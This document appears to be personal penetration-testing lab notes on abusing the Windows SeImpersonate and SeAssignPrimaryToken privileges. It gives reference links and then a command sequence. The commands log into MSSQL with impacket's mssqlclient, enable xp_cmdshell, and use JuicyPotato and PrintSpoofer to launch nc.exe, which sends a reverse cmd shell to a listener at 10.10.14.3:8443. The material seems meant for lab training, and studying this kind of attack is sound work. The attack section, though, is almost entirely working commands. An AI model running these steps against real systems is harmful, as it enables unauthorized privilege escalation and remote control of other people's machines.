Abuse of SeImpersonate and SeAssignPrimaryToken

Recursos

https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw

https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/impersonate-a-client-after-authentication

https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege

https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw

https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessasusera

https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/

---

Tools

• https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py

• Juicy Potato

• PrintSpoofer

• RoguePotato

---

# Connecting with MSSQLClient.py
mssqlclient.py sql_dev@10.129.43.30 -windows-auth
# Enabling xp_cmdshell
SQL> enable_xp_cmdshell
# Confirming Access
SQL> xp_cmdshell whoami
# Checking Account Privileges
SQL> xp_cmdshell whoami /priv
# Download the JuicyPotato.exe and upload this and nc.exe to the target server
# Escalating Privileges Using JuicyPotato
# Stand up a Netcat listener on port 8443
sudo nc -lnvp 8443
SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

# Escalating Privileges using PrintSpoofer
nc -lnvp 8443
SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"